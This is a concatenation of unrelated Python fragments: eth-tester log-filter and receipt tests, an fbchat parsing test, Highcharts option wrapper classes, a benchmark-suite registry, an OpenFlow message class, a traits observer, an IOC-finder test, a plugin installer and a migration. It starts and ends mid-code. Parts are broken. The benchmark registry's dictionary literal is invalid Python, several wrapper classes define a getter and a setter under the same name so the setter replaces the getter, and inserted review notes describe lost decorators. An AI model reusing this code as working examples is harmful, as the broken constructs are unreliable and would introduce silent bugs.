    assert (len(filter_a_changes_part_2) == 7)
    assert (len(filter_b_changes) == 12)
    assert (len(filter_a_logs_part_2) == 20)
    assert (len(filter_b_logs_part_2) == 12)
    assert (set(filter_a_changes_part_2) == set(transactions_13_to_20))
    assert (set(filter_b_changes) == set(filter_b_logs_part_2))
    assert (set(filter_b_changes) == set(transactions_8_to_12).union(transactions_13_to_20))
    assert (set(filter_a_logs_part_2) == set(transactions_0_to_7).union(transactions_8_to_12).union(transactions_13_to_20))
    assert (set(filter_b_logs_part_2) == set(transactions_8_to_12).union(transactions_13_to_20))
@pytest.mark.parametrize(
    'filter_topics,expected',
    (
        [None, 1],
        [[], 1],
        [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15'], 1],
        [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15', None], 1],
        [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15', (('0x' + ('00' * 31)) + '02')], 1],
        [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15', (('0x' + ('00' * 31)) + '99')], 0],
        # Raw 32-byte topic. NOTE(review): the bytes literal was corrupted in
        # this source; rebuilt from the hex form used in the cases above.
        [[bytes.fromhex('f70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15')], 1],
    ),
    ids=['filter None', 'filter []', 'filter Event only', 'filter Event and None', 'filter Event and argument', 'filter Event and wrong argument', 'filter Event only bytes'],
)
def test_log_filter_picks_up_new_logs(self, eth_tester, filter_topics, expected):
    """A topic-filtered log filter (and get_logs) matches only the events
    whose topics satisfy the filter.

    NOTE(review): the ``@pytest.mark`` prefix on the parametrize decorator
    was missing from this source; it has been restored.
    """
    self.skip_if_no_evm_execution()
    emitter_address = _deploy_emitter(eth_tester)
    # Emitted before the filter exists; only the second event is in range.
    emit_a_hash = _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 1])
    eth_tester.get_transaction_receipt(emit_a_hash)
    filter_event = eth_tester.create_log_filter(topics=filter_topics)
    _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 2])
    specific_logs_changes = eth_tester.get_only_filter_changes(filter_event)
    specific_logs_all = eth_tester.get_all_filter_logs(filter_event)
    specific_direct_logs_all = eth_tester.get_logs(topics=filter_topics)
    assert (len(specific_logs_changes) == expected)
    assert (len(specific_logs_all) == expected)
    assert (len(specific_direct_logs_all) == expected)
@pytest.mark.parametrize(
    'filter_topics',
    ('not a list', {}, 1, [1], [1, 2], [1, None], [None, 1], [encode_hex(((b'\x00' * 30) + b'\x01'))], [encode_hex(((b'\x00' * 32) + b'\x01'))]),
    ids=['filter string', 'filter dict', 'filter int', 'filter int in list', 'filter multiple ints in list', 'filter int and None in list', 'filter None and int in list', 'filter bytes with less than 32 bytes', 'filter bytes with more than 32 bytes'],
)
def test_log_filter_invalid_topics_throws_error(self, eth_tester, filter_topics):
    """Malformed topic filters are rejected with ValidationError.

    NOTE(review): the ``@pytest.mark`` prefix on the parametrize decorator
    was missing from this source; it has been restored.
    """
    self.skip_if_no_evm_execution()
    emitter_address = _deploy_emitter(eth_tester)
    _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 1])
    with pytest.raises(ValidationError):
        eth_tester.create_log_filter(from_block=0, topics=filter_topics)
def test_log_filter_includes_old_logs(self, eth_tester):
    """A filter created with from_block=0 reports logs emitted before it."""
    self.skip_if_no_evm_execution()
    emitter_address = _deploy_emitter(eth_tester)
    _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 1])
    catch_all_filter = eth_tester.create_log_filter(from_block=0)
    _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 2])
    changed = eth_tester.get_only_filter_changes(catch_all_filter)
    everything = eth_tester.get_all_filter_logs(catch_all_filter)
    direct = eth_tester.get_logs(from_block=0)
    assert len(changed) == len(everything) == len(direct) == 2
def test_log_filter_includes_latest_block_with_to_block(self, eth_tester):
    """A to_block bound at 'latest' still captures logs in that block."""
    self.skip_if_no_evm_execution()
    emitter_address = _deploy_emitter(eth_tester)
    no_of_events = 2
    for value in range(1, no_of_events + 1):
        _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], value])
    bounded_filter = eth_tester.create_log_filter(from_block=0, to_block=eth_tester.get_block_by_number('latest')['number'])
    changed = eth_tester.get_only_filter_changes(bounded_filter)
    everything = eth_tester.get_all_filter_logs(bounded_filter)
    assert len(changed) == len(everything) == no_of_events
def test_delete_filter(self, eth_tester):
    """Once deleted, a filter id is unusable by every filter operation."""
    self.skip_if_no_evm_execution()
    filter_id = eth_tester.create_block_filter()
    # Works while the filter exists.
    eth_tester.get_all_filter_logs(filter_id)
    eth_tester.get_only_filter_changes(filter_id)
    eth_tester.delete_filter(filter_id)
    # Every operation on the deleted id fails uniformly.
    for operation in (eth_tester.get_all_filter_logs, eth_tester.get_only_filter_changes, eth_tester.delete_filter):
        with pytest.raises(FilterNotFound):
            operation(filter_id)
    # A never-allocated id fails the same way.
    with pytest.raises(FilterNotFound):
        eth_tester.delete_filter(12345)
def test_receipt_gas_used_computation(self, eth_tester):
    """cumulative_gas_used is the running sum of gas_used within a block."""
    eth_tester.disable_auto_mine_transactions()
    sent_hashes = []
    for i in range(4):
        txn = {'from': eth_tester.get_accounts()[i], 'to': eth_tester.get_accounts()[(i + 1)], 'gas': (((i + 1) * 20000) + 10000), 'value': 1}
        sent_hashes.append(eth_tester.send_transaction(txn))
    # Mine all four into a single block so their receipts accumulate.
    eth_tester.mine_block()
    running_total = 0
    for txn_hash in sent_hashes:
        receipt = eth_tester.get_transaction_receipt(txn_hash)
        running_total += receipt['gas_used']
        assert receipt['gas_used'] == 21000
        assert receipt['cumulative_gas_used'] == running_total
def test_time_traveling(self, eth_tester):
    """time_travel advances one block and sets its timestamp to the target."""
    eth_tester.mine_blocks(3)
    pre = eth_tester.get_block_by_number('pending')
    eth_tester.time_travel(pre['timestamp'] + 120)
    post = eth_tester.get_block_by_number('pending')
    assert post['number'] == pre['number'] + 1
    assert post['timestamp'] == pre['timestamp'] + 120
def test_time_traveling_backwards_not_allowed(self, eth_tester):
    """Travelling to a timestamp in the past is rejected."""
    eth_tester.mine_blocks(3)
    current_timestamp = eth_tester.get_block_by_number('pending')['timestamp']
    with pytest.raises(ValidationError):
        eth_tester.time_travel(current_timestamp - 10)
@pytest.mark.parametrize('test_transaction', (SIMPLE_TRANSACTION,), ids=['Simple transaction'])
def test_get_transaction_receipt_byzantium(self, eth_tester, test_transaction):
    """Receipts include a post-Byzantium ``status`` field equal to 1.

    NOTE(review): the ``@pytest.mark`` prefix on the parametrize decorator
    was missing from this source; it has been restored.
    """
    # Run against a fresh tester built from the same backend class.
    backend = eth_tester.backend.__class__()
    byzantium_eth_tester = eth_tester.__class__(backend=backend)
    accounts = byzantium_eth_tester.get_accounts()
    assert accounts, 'No accounts available for transaction sending'
    transaction = assoc(test_transaction, 'from', accounts[0])
    txn_hash = byzantium_eth_tester.send_transaction(transaction)
    txn = byzantium_eth_tester.get_transaction_receipt(txn_hash)
    assert ('status' in txn)
    assert (txn['status'] == 1)
def test_duplicate_log_entries(self, eth_tester):
    """Filters over the same range agree on counts and never double-count."""
    self.skip_if_no_evm_execution()
    emitter_address = _deploy_emitter(eth_tester)
    def _emit(v):
        return _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], v])
    first_filter = eth_tester.create_log_filter(from_block=0)
    assert len(eth_tester.get_all_filter_logs(first_filter)) == 0
    _emit(1)
    assert len(eth_tester.get_all_filter_logs(first_filter)) == 1
    _emit(2)
    assert len(eth_tester.get_all_filter_logs(first_filter)) == 2
    # A second filter over the same range sees the same two logs, and its
    # creation does not duplicate entries in the first filter.
    second_filter = eth_tester.create_log_filter(from_block=0)
    assert len(eth_tester.get_all_filter_logs(first_filter)) == 2
    assert len(eth_tester.get_all_filter_logs(second_filter)) == 2
def test_admins_removed(session):
    """An iris 'remove_admin' delta parses into the expected AdminsRemoved event.

    NOTE(review): the ``offlineThreadingId`` and ``timestamp`` payload values
    are empty strings here, which looks like literals stripped from this
    source (the expected event carries a concrete 2017-07-14 timestamp) —
    confirm the payload against the original fixture.
    """
    # Raw fan-out payload as received for an admin-removal thread update.
    data = {'irisSeqId': '1111111', 'irisTags': ['DeltaAdminTextMessage', 'is_from_iris_fanout'], 'messageMetadata': {'actorFbId': '1234', 'adminText': 'You removed yourself as a group admin.', 'folderId': {'systemFolderId': 'INBOX'}, 'messageId': 'mid.$XYZ', 'offlineThreadingId': '', 'skipBumpThread': True, 'tags': ['source:titan:web'], 'threadKey': {'threadFbId': '4321'}, 'threadReadStateEffect': 'KEEP_AS_IS', 'timestamp': '', 'unsendType': 'deny_log_message'}, 'participants': ['1234', '2345', '3456'], 'requestContext': {'apiArgs': {}}, 'tqSeqId': '1111', 'type': 'change_thread_admins', 'untypedData': {'THREAD_CATEGORY': 'GROUP', 'TARGET_ID': '1234', 'ADMIN_TYPE': '0', 'ADMIN_EVENT': 'remove_admin'}, 'class': 'AdminTextMessage'}
    assert (AdminsRemoved(author=User(session=session, id='1234'), thread=Group(session=session, id='4321'), removed=[User(session=session, id='1234')], at=datetime.datetime(2017, 7, 14, 2, 40, tzinfo=datetime.timezone.utc)) == parse_admin_message(session, data))
def get_companies_employees_activity(df: DataFrame, commits_id_field: str, author_email_field: str, company_field: str, result_field: str='Commits') -> DataFrame:
    """Count commits per (author e-mail, company) pair.

    Returns a DataFrame with ``author_email_field``, ``company_field`` and a
    ``result_field`` column holding the commit count for each pair.
    """
    selected = df.select(f.col(commits_id_field), f.col(author_email_field), f.col(company_field))
    grouped = selected.groupBy(author_email_field, company_field)
    return grouped.agg(f.count(f.col(commits_id_field)).alias(result_field))
class CaseNodeSerializer(AbstractSyntaxTreeNodeSerializer):
    """(De)serializes CaseNode instances to and from plain dicts."""

    def serialize(self, node: CaseNode) -> Dict:
        """Extend the base node serialization with case-specific fields."""
        data = super().serialize(node)
        data['expression'] = self._pseudo.serialize(node.expression)
        data['constant'] = self._pseudo.serialize(node.constant)
        data['break_case'] = node.break_case
        return data

    def deserialize(self, data: dict) -> CaseNode:
        """Rebuild a CaseNode from a dict produced by :meth:`serialize`."""
        return CaseNode(
            expression=self._pseudo.deserialize(data['expression']),
            constant=self._pseudo.deserialize(data['constant']),
            reaching_condition=LogicCondition.deserialize(data['rc'], self._group.new_context),
            break_case=data['break_case'],
        )
class OptionSonificationGlobalcontexttracksMappingGapbetweennotes(Options):
    """Option wrapper for the gap-between-notes mapping settings.

    NOTE(review): in this source each getter/setter pair appeared as two
    plain methods with the same name, so the setter silently shadowed the
    getter; the ``@property`` / ``@<name>.setter`` decorators have been
    restored — confirm against the original generated sources.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def value(self):
        return self._config_get(None)

    @value.setter
    def value(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class ReferenceMixin(object):
    """Mixin adding a ``references`` relationship of ``Link`` instances.

    NOTE(review): the bare ``_attr`` and ``('references')`` expressions
    below look like decompilation remnants of ``@declared_attr`` and
    ``@validates('references')`` decorators (SQLAlchemy declarative-mixin
    and validation patterns) — confirm against the original sources before
    relying on this class.
    """
    def __init__(self, references=None, **kwargs):
        # Normalize None to a fresh list to avoid a shared mutable default.
        if (references is None):
            references = []
        self.references = references
    # NOTE(review): presumably ``@declared_attr`` — decorator marker lost.
    _attr
    def references(cls):
        # Many-to-many through a generated "<Class>_References" secondary table.
        secondary_table = create_secondary_table(cls.__name__, 'Link', cls.__tablename__, 'Links', ('%s_References' % cls.__name__))
        return relationship('Link', secondary=secondary_table, doc='A list of :class:`.Link` instances given as a reference for\n    this entity.\n    ')
    # NOTE(review): presumably ``@validates('references')`` — marker lost.
    ('references')
    def _validate_references(self, key, reference):
        from stalker.models.link import Link
        # Only Link instances may be appended to the references collection.
        if (not isinstance(reference, Link)):
            raise TypeError(('All the elements in the %s.references should be stalker.models.link.Link instances not %s' % (self.__class__.__name__, reference.__class__.__name__)))
        return reference
def test_dpm_solver_diffusers():
    """Refiners' DPMSolver matches diffusers' multistep scheduler per step."""
    from diffusers import DPMSolverMultistepScheduler as DiffuserScheduler
    manual_seed(0)
    reference = DiffuserScheduler(beta_schedule='scaled_linear', beta_start=0.00085, beta_end=0.012)
    reference.set_timesteps(30)
    ours = DPMSolver(num_inference_steps=30)
    sample = randn(1, 3, 32, 32)
    noise = randn(1, 3, 32, 32)
    for step, timestep in enumerate(reference.timesteps):
        expected = cast(Tensor, reference.step(noise, timestep, sample).prev_sample)
        actual = ours(x=sample, noise=noise, step=step)
        assert allclose(expected, actual, rtol=0.01), f'outputs differ at step {step}'
class Benchmarks():
    """Registry of benchmark suites (pyperformance / pyston) plus helpers to
    resolve which suite a benchmark name belongs to.

    NOTE(review): ``_load_suite``, ``_get_names`` and ``_iter_subcandidates``
    take ``cls`` as first parameter -- they look like stripped
    ``@classmethod``s.
    """

    REPOS = os.path.join(_utils.HOME, 'repos')  # where suite repos get cloned
    PYPERFORMANCE = 'pyperformance'
    PYSTON = 'pyston'
    # NOTE(review): the 'url' values appear redacted in this copy -- the
    # literal as written is not valid Python; preserved byte-for-byte.
    _SUITES: Dict[(str, Dict[(str, Any)])] = {PYPERFORMANCE: {'url': ' 'reldir': 'pyperformance/data-files/benchmarks', 'show_results': True}, PYSTON: {'url': ' 'reldir': 'benchmarks', 'show_results': True}}
    SUITES: Dict[(str, BenchmarkSuiteInfo)] = {}
    for _suitename in _SUITES:
        SUITES[_suitename] = BenchmarkSuiteInfo(_suitename, **_SUITES[_suitename])
    # Keep the class namespace clean of loop temporaries.
    del _suitename
    del _SUITES

    def _load_suite(cls, suite: str) -> List[str]:
        """Clone the suite repo if missing and return its benchmark names."""
        info = cls.SUITES[suite]
        url = info.url
        reldir = info.reldir
        reporoot = os.path.join(cls.REPOS, os.path.basename(url))
        if (not os.path.exists(reporoot)):
            if (not os.path.exists(cls.REPOS)):
                os.makedirs(cls.REPOS)
            _utils.git('clone', url, reporoot, cwd=None)
        names = cls._get_names(os.path.join(reporoot, reldir))
        return list(names)

    def _get_names(cls, benchmarksdir: str) -> Iterable[str]:
        """Yield benchmark names from a MANIFEST file, falling back to
        ``bm_*`` directory names when there is no manifest."""
        manifest = os.path.join(benchmarksdir, 'MANIFEST')
        if os.path.isfile(manifest):
            with open(manifest) as infile:
                # Find the '[benchmarks]' section, then its header row.
                for line in infile:
                    if (line.strip() == '[benchmarks]'):
                        for line in infile:
                            if (line.strip() == 'name\tmetafile'):
                                break
                        else:
                            # Section present but header row missing.
                            raise NotImplementedError(manifest)
                        break
                else:
                    # No '[benchmarks]' section at all.
                    raise NotImplementedError(manifest)
                for line in infile:
                    if line.startswith('['):
                        # Next section begins -- stop.
                        break
                    line = line.strip()
                    if ((not line) or line.startswith('#')):
                        continue
                    (name, _) = line.split('\t')
                    (yield name)
        else:
            for name in os.listdir(benchmarksdir):
                if name.startswith('bm_'):
                    (yield name[3:])

    def _iter_subcandidates(cls, bench: str) -> Iterable[str]:
        """Yield progressively shorter '_'-prefixes of a benchmark name."""
        while ('_' in bench):
            (bench, _, _) = bench.rpartition('_')
            (yield bench)

    def __init__(self):
        # Cache: suite name -> list of benchmark names.
        self._cache = {}

    def __eq__(self, other):
        raise NotImplementedError

    def get_suites(self, benchmarks: Iterable[str], default: Optional[str]=None) -> Dict[(str, Optional[str])]:
        """Map each benchmark name to its suite (or ``default``)."""
        mapped: Dict[(str, Optional[str])] = {}
        suite: Any
        by_bench = self.load('name')
        for bench in benchmarks:
            try:
                suite = by_bench[bench]
            except KeyError:
                # Fall back to shorter prefixes (e.g. 'foo_bar' -> 'foo').
                for sub in self._iter_subcandidates(bench):
                    if (sub in by_bench):
                        suite = by_bench[sub]
                        break
                else:
                    suite = default
            if ((suite is None) or isinstance(suite, str)):
                mapped[bench] = suite
            else:
                raise TypeError(f'Invalid suite type {type(suite)}')
        return mapped

    def get_suite(self, bench: str, default: Optional[str]=None) -> Optional[str]:
        """Return the suite for a single benchmark name (or ``default``)."""
        by_suite = (self._cache if self._cache else self._load())
        suite = self._get_suite(bench, by_suite)
        if suite:
            return suite
        for sub in self._iter_subcandidates(bench):
            suite = self._get_suite(sub, by_suite)
            if suite:
                return suite
        else:
            return default

    def _get_suite(self, bench, by_suite):
        # Linear scan of all suites for a name match.
        for (suite, names) in by_suite.items():
            if (bench in names):
                return suite
        else:
            return None

    def load(self, key: str='name') -> Union[(Dict[(str, List[str])], Dict[(str, str)])]:
        """Return suite data keyed by 'suite' (suite -> names) or by 'name'
        (name -> suite)."""
        by_suite = self._load()
        if (key == 'suite'):
            return {s: list(n) for (s, n) in by_suite.items()}
        elif (key == 'name'):
            by_name = {}
            for (suite, names) in by_suite.items():
                for name in names:
                    if (name in by_name):
                        # Benchmark names must be unique across suites.
                        raise NotImplementedError((suite, name))
                    by_name[name] = suite
            return by_name
        else:
            raise ValueError(f'unsupported key {key!r}')

    def _load(self):
        # Fill the cache for every registered suite, once.
        for suite in self.SUITES:
            if (suite not in self._cache):
                self._cache[suite] = self._load_suite(suite)
        return self._cache
class OptionPlotoptionsPyramidSonificationDefaultinstrumentoptionsMappingHighpassResonance(Options):
    """Highcharts config wrapper: pyramid sonification highpass resonance mapping.

    NOTE(review): each option appears as a getter/setter pair with the same
    name -- the original @property/@<name>.setter decorators appear stripped.
    """

    def mapFunction(self):
        # Getter (default None).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter (default None).
        return self._config_get(None)

    def mapTo(self, text: str):
        # Setter.
        self._config(text, js_type=False)

    def max(self):
        # Getter (default None).
        return self._config_get(None)

    def max(self, num: float):
        # Setter.
        self._config(num, js_type=False)

    def min(self):
        # Getter (default None).
        return self._config_get(None)

    def min(self, num: float):
        # Setter.
        self._config(num, js_type=False)

    def within(self):
        # Getter (default None).
        return self._config_get(None)

    def within(self, value: Any):
        # Setter.
        self._config(value, js_type=False)
class port_desc_stats_reply(stats_reply):
    """Generated-style loxi message: port-desc stats reply (wire version 5).

    NOTE(review): ``unpack`` takes only ``reader`` -- it looks like a stripped
    ``@staticmethod``.
    """
    version = 5      # OpenFlow wire version
    type = 19        # stats reply message type
    stats_type = 13  # port-desc stats

    def __init__(self, xid=None, flags=None, entries=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (flags != None):
            self.flags = flags
        else:
            self.flags = 0
        if (entries != None):
            self.entries = entries
        else:
            self.entries = []
        return

    def pack(self):
        """Serialize to wire format; the length field is patched in last."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder (index 2)
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.stats_type))
        packed.append(struct.pack('!H', self.flags))
        packed.append(('\x00' * 4))  # 4 bytes padding
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        """Deserialize from ``reader``; asserts the fixed header fields."""
        obj = port_desc_stats_reply()
        _version = reader.read('!B')[0]
        assert (_version == 5)
        _type = reader.read('!B')[0]
        assert (_type == 19)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Restrict further reads to this message's length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _stats_type = reader.read('!H')[0]
        assert (_stats_type == 13)
        obj.flags = reader.read('!H')[0]
        reader.skip(4)  # padding
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.port_desc.unpack)
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.flags != other.flags):
            return False
        if (self.entries != other.entries):
            return False
        return True

    def pretty_print(self, q):
        """Human-readable dump through the pretty-printer ``q``."""
        q.text('port_desc_stats_reply {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPSF_REPLY_MORE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('entries = ')
                q.pp(self.entries)
            q.breakable()
        q.text('}')
class SetItemObserver():
    """Observer for mutations of a TraitSet.

    ``notify`` controls whether change notifications fire; ``optional`` makes
    non-TraitSet objects be skipped silently instead of raising.
    """

    __slots__ = ('notify', 'optional')

    def __init__(self, *, notify, optional):
        self.notify = notify
        self.optional = optional

    def __hash__(self):
        # Hash is consistent with __eq__: type name plus both flags.
        return hash((type(self).__name__, self.notify, self.optional))

    def __eq__(self, other):
        if type(self) is not type(other):
            return False
        return (self.notify, self.optional) == (other.notify, other.optional)

    def __repr__(self):
        return (
            f"{self.__class__.__name__}"
            f"(notify={self.notify!r}, optional={self.optional!r})"
        )

    def iter_observables(self, object):
        """Yield the observed TraitSet itself; honor ``optional`` otherwise."""
        if isinstance(object, TraitSet):
            yield object
            return
        if not self.optional:
            raise ValueError(
                'Expected a TraitSet to be observed, got {!r} (type: {!r})'.format(object, type(object)))

    def iter_objects(self, object):
        """Yield the members of the observed TraitSet; honor ``optional``."""
        if isinstance(object, TraitSet):
            yield from object
            return
        if not self.optional:
            raise ValueError(
                'Expected a TraitSet to be observed, got {!r} (type: {!r})'.format(object, type(object)))

    def get_notifier(self, handler, target, dispatcher):
        """Build the change notifier for set events (never filtered out)."""
        return TraitEventNotifier(
            handler=handler,
            target=target,
            dispatcher=dispatcher,
            event_factory=set_event_factory,
            prevent_event=(lambda event: False),
        )

    def get_maintainer(self, graph, handler, target, dispatcher):
        """Build the maintainer that keeps downstream observers wired up."""
        return ObserverChangeNotifier(
            observer_handler=_observer_change_handler,
            event_factory=set_event_factory,
            prevent_event=(lambda event: False),
            graph=graph,
            handler=handler,
            target=target,
            dispatcher=dispatcher,
        )

    def iter_extra_graphs(self, graph):
        """Set observers contribute no extra graphs."""
        return
        yield  # unreachable: keeps this a generator function
def test_authentihash():
    """Digests labelled 'authentihash' parse as authentihashes, never sha256s."""
    digest = '3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4'
    # Same separator variants (including duplicates) as the original templates.
    separators = (' ', ' ', ': ', ': ', ' - ', '-', '\t', '\n')
    for sep in separators:
        for name in ['authentihash']:
            template = '{}' + sep + digest
            print(template)
            for label in (name, name.upper()):
                iocs = find_iocs(template.format(label))
                assert len(iocs['authentihashes']) == 1
                assert iocs['authentihashes'] == [digest]
                assert len(iocs['sha256s']) == 0
class OptionSeriesVennSonificationDefaultinstrumentoptions(Options):
    """Highcharts config wrapper: venn-series sonification default instrument options.

    NOTE(review): getter/setter pairs share names -- the original
    @property-style decorators appear stripped in this copy.
    """

    def activeWhen(self) -> 'OptionSeriesVennSonificationDefaultinstrumentoptionsActivewhen':
        # Sub-options container.
        return self._config_sub_data('activeWhen', OptionSeriesVennSonificationDefaultinstrumentoptionsActivewhen)

    def instrument(self):
        # Getter (default 'piano').
        return self._config_get('piano')

    def instrument(self, text: str):
        # Setter.
        self._config(text, js_type=False)

    def mapping(self) -> 'OptionSeriesVennSonificationDefaultinstrumentoptionsMapping':
        # Sub-options container.
        return self._config_sub_data('mapping', OptionSeriesVennSonificationDefaultinstrumentoptionsMapping)

    def midiName(self):
        # Getter (default None).
        return self._config_get(None)

    def midiName(self, text: str):
        # Setter.
        self._config(text, js_type=False)

    def pointGrouping(self) -> 'OptionSeriesVennSonificationDefaultinstrumentoptionsPointgrouping':
        # Sub-options container.
        return self._config_sub_data('pointGrouping', OptionSeriesVennSonificationDefaultinstrumentoptionsPointgrouping)

    def roundToMusicalNotes(self):
        # Getter (default True).
        return self._config_get(True)

    def roundToMusicalNotes(self, flag: bool):
        # Setter.
        self._config(flag, js_type=False)

    def showPlayMarker(self):
        # Getter (default True).
        return self._config_get(True)

    def showPlayMarker(self, flag: bool):
        # Setter.
        self._config(flag, js_type=False)

    def type(self):
        # Getter (default 'instrument').
        return self._config_get('instrument')

    def type(self, text: str):
        # Setter.
        self._config(text, js_type=False)
class CellDerivatives(FilterBase):
    """Mayavi pipeline filter wrapping ``tvtk.CellDerivatives``."""
    __version__ = 0

    # The wrapped TVTK filter instance.
    filter = Instance(tvtk.CellDerivatives, args=(), allow_none=False, record=True)
    # Accepts and produces any dataset/attribute combination.
    input_info = PipelineInfo(datasets=['any'], attribute_types=['any'], attributes=['any'])
    output_info = PipelineInfo(datasets=['any'], attribute_types=['any'], attributes=['any'])

    def has_output_port(self):
        """This filter exposes a VTK output port."""
        return True

    def get_output_object(self):
        """Return the wrapped filter's VTK output port."""
        return self.filter.output_port
def upgrade():
    """Alembic upgrade: add ``last_changed`` timestamps to the RSS parser
    function tables, backfill existing rows, then enforce NOT NULL."""
    op.add_column('rss_parser_funcs', sa.Column('last_changed', sa.DateTime(), nullable=True))
    op.add_column('rss_parser_funcs_version', sa.Column('last_changed', sa.DateTime(), autoincrement=False, nullable=True))
    bind = op.get_bind()
    sess = Session(bind=bind)
    print('Updating date/time stamps for functions.')
    # Backfill so the NOT NULL constraint below can be applied.
    sess.query(RssFeedEntry).update({'last_changed': datetime.datetime.now()})
    sess.commit()
    print('Update done.')
    op.alter_column('rss_parser_funcs', 'last_changed', nullable=False)
class AbstractPluginInstaller():
    """Base class for FACT plugin installers.

    Subclasses set ``base_path`` and override the hook methods as needed.
    """
    # Honor the FACT_INSTALLER_SKIP_DOCKER environment switch.
    _skip_docker_env = (os.getenv('FACT_INSTALLER_SKIP_DOCKER') is not None)
    # Must be set by subclasses to the plugin directory (a Path).
    base_path = None

    def __init__(self, distribution: (str | None)=None, skip_docker: bool=_skip_docker_env):
        self.distribution = (distribution or check_distribution())
        self.build_path = (self.base_path / 'build')
        self.skip_docker = skip_docker

    def install(self):
        """Run the full install pipeline from the plugin's base directory."""
        cwd = os.getcwd()
        os.chdir(self.base_path)
        self.install_system_packages()
        self.install_pip_packages()
        self.install_other_packages()
        self.install_files()
        try:
            self.build_path.mkdir(exist_ok=True)
            os.chdir(self.build_path)
            self.build()
        finally:
            # Always clean up the build dir, even if build() failed.
            run_cmd_with_logging(f'sudo rm -rf {self.build_path}')
            os.chdir(self.base_path)
        if (not self.skip_docker):
            self.install_docker_images()
        os.chdir(cwd)

    def install_docker_images(self):
        """Hook: build/pull docker images (no-op by default)."""

    def install_system_packages(self):
        """Install build and runtime system packages for the detected distribution."""
        build_pkg_path = Path(('./apt-pkgs-build.txt' if (self.distribution != 'fedora') else './dnf-pkgs-build.txt'))
        runtime_pkg_path = Path(('./apt-pkgs-runtime.txt' if (self.distribution != 'fedora') else './dnf-pkgs-runtime.txt'))
        pkg_list = (_read_packages(build_pkg_path) + _read_packages(runtime_pkg_path))
        pgk_mgr_cmd = ('apt install -y' if (self.distribution != 'fedora') else 'dnf install -y')
        pkgs_to_install = ' '.join(pkg_list)
        if (len(pkgs_to_install) == 0):
            # Nothing to install.
            return
        run_cmd_with_logging(f'sudo {pgk_mgr_cmd} {pkgs_to_install}')

    def install_pip_packages(self):
        """Install python requirements when a requirements.txt is present."""
        requirements_path = (self.base_path / 'requirements.txt')
        if requirements_path.exists():
            install_pip_packages(requirements_path)

    def install_other_packages(self):
        """Hook: install other package types (no-op by default)."""

    def install_files(self):
        """Hook: install static files (no-op by default)."""

    def build(self):
        """Hook: compile/build steps, executed inside the build dir (no-op by default)."""

    def _build_docker_image(self, tag: str, dockerfile_path: (Path | None)=None):
        """Build a docker image from the plugin's ``docker`` dir (or the given path)."""
        if (not dockerfile_path):
            dockerfile_path = (self.base_path / 'docker')
        run_cmd_with_logging(f'docker build -t {tag} {dockerfile_path}')
def _prepare_executable(repository_path: str, exe_path: str, package_name: str, version: str) -> str:
    """Resolve the executable path (downloading unless the repo is LOCAL) and
    ensure it carries the owner-execute bit."""
    exe_name = _parse_package_name(package_name)
    executable = _build_executable_path(exe_path, exe_name)
    if repository_path.upper() == 'LOCAL':
        logger.info('Local repository, skip download and attestation ...')
    else:
        _download_executables(repository_path, exe_path, package_name, version)
    if not os.access(executable, os.X_OK):
        # Add the execute bit while keeping the existing mode.
        os.chmod(executable, os.stat(executable).st_mode | stat.S_IEXEC)
    return executable
def extractHyakurosTumblrCom(item):
    """Parser for 'hyakuros.tumblr.com': None = skip item, False = no match."""
    if any(bad in item['tags'] for bad in ['Manga']):
        return None
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    releases = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    for tagname, name, tl_type in releases:
        if tagname in item['tags']:
